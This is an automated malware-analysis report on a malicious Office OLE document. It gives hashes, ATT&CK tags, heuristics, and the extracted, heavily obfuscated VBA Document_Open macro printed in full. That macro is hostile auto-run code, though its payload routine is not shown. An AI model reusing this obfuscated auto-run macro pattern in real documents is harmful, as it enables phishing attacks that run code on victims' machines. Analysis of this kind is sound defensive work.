Office (OLE) malware analysis — malicious · 151c052da908cfcb

MALICIOUS

Office (OLE)

61.9 KB First seen: 2019-04-18

MD5: d3931028d37213935c407336a839824a SHA-1: 0092135abb9d8419675cc853b4bb5f8ee71d4b3c SHA-256: 151c052da908cfcb2b7b948d88c21c8c39b5682ebf17713f173d7079d26be865

102 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is an OLE document containing VBA macros, with a high-confidence heuristic indicating the presence of a Document_Open macro. The VBA code is heavily obfuscated, making its exact function difficult to determine, but it is designed to execute upon opening the document. This suggests an attempt to download and execute a secondary payload, characteristic of a malicious document delivered via spearphishing.

Heuristics 4

OLE document has large unaccounted-for region high OLE_SLACK_ANOMALY

OLE file is 63,384 bytes but its declared streams total only 36,250 bytes — 27,134 bytes (43%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1544 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	1544 bytes
SHA-256: `bd17f884dd9e35a9c31e390daa8f8d0ce75f25da5d777b2571899e9a63bc6350`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "VkUNSMIFcHli" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Document_Open() If BbIjW < GEOwND Then Dim mWYjB() RnvfU = MkUlqk + TZUucl + iYRIcr + RidrKo End If If YYKaX > joQqBS Then Dim iUFbUw() jhYqZ = IuJZUf + KNvaFw + ziDHr + wTrzJ EZirA = Bhamf + VVkSRZ + WXZEwi + zPrpD End If If dFwnAJ And lSYMi Then Dim nRbwuF() tVnCdl = Grufww + wOwol + UmzkQM + dMBvQ End If If AIStKP Xor 9 Then Dim CuYsP() KrCdHJ = SGVCm + ZSuqw + NBYnw + dVYRs rAhBmJ = nGPiu + PHupvI End If If CdlDGY < nuAOuK Then Dim jYfkSK() wXiBj = jjdJoB + wDPjC End If If SVdfr Or 11 Then Dim VKRPX() PSEGHB = atHQra + vnfIwi Aqctw = bcZON + CmwuwH End If If YQLEmF <= JhfJTp Then Dim OcbNJ() wwUsDG = HwtjA + GujfY + tMSvt + uvkXU End If PdXuwnNPRQVh (LvzrE + umFKBXFism + jMXcV + hVVcOoBDGK + owPoDAlrnI + WwNaIf + JhPzAwQ + AAmvj + IAFhYCiI + juDbOdtXPJz + pdawSBji + nvIDj) If FOPavC > 6 Then Dim LEKBmj() iCYdsp = WWOaBW + QbFZDB + qszzZA + tOqTb End If If zXVfs <> vGjMv Then Dim iGCrk() jEIYuc = SwZrGK + SOfwR End If If wCGPij < anIKm Then Dim daABZc() nMWaK = HHwwq + NsXPc End If If MGTZrD <= rAAtfA Then Dim dEbjhU() JbdToT = IYHauA + VmAMz + wszFuA + QKOkt ACiqF = kEjcs + lArIS End If End Sub

SHA-256: bd17f884dd9e35a9c31e390daa8f8d0ce75f25da5d777b2571899e9a63bc6350

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "VkUNSMIFcHli"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
   If BbIjW < GEOwND Then

Dim mWYjB()
RnvfU = MkUlqk + TZUucl + iYRIcr + RidrKo

End If
   If YYKaX > joQqBS Then

Dim iUFbUw()
jhYqZ = IuJZUf + KNvaFw + ziDHr + wTrzJ
EZirA = Bhamf + VVkSRZ + WXZEwi + zPrpD

End If
   If dFwnAJ And lSYMi Then

Dim nRbwuF()
tVnCdl = Grufww + wOwol + UmzkQM + dMBvQ

End If
   If AIStKP Xor 9 Then

Dim CuYsP()
KrCdHJ = SGVCm + ZSuqw + NBYnw + dVYRs
rAhBmJ = nGPiu + PHupvI

End If
   If CdlDGY < nuAOuK Then

Dim jYfkSK()
wXiBj = jjdJoB + wDPjC

End If
   If SVdfr Or 11 Then

Dim VKRPX()
PSEGHB = atHQra + vnfIwi
Aqctw = bcZON + CmwuwH

End If
   If YQLEmF <= JhfJTp Then

Dim OcbNJ()
wwUsDG = HwtjA + GujfY + tMSvt + uvkXU

End If
PdXuwnNPRQVh (LvzrE + umFKBXFism + jMXcV + hVVcOoBDGK + owPoDAlrnI + WwNaIf + JhPzAwQ + AAmvj + IAFhYCiI + juDbOdtXPJz + pdawSBji + nvIDj)
   If FOPavC > 6 Then

Dim LEKBmj()
iCYdsp = WWOaBW + QbFZDB + qszzZA + tOqTb

End If
   If zXVfs <> vGjMv Then

Dim iGCrk()
jEIYuc = SwZrGK + SOfwR

End If
   If wCGPij < anIKm Then

Dim daABZc()
nMWaK = HHwwq + NsXPc

End If
   If MGTZrD <= rAAtfA Then

Dim dEbjhU()
JbdToT = IYHauA + VmAMz + wszFuA + QKOkt
ACiqF = kEjcs + lArIS

End If
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.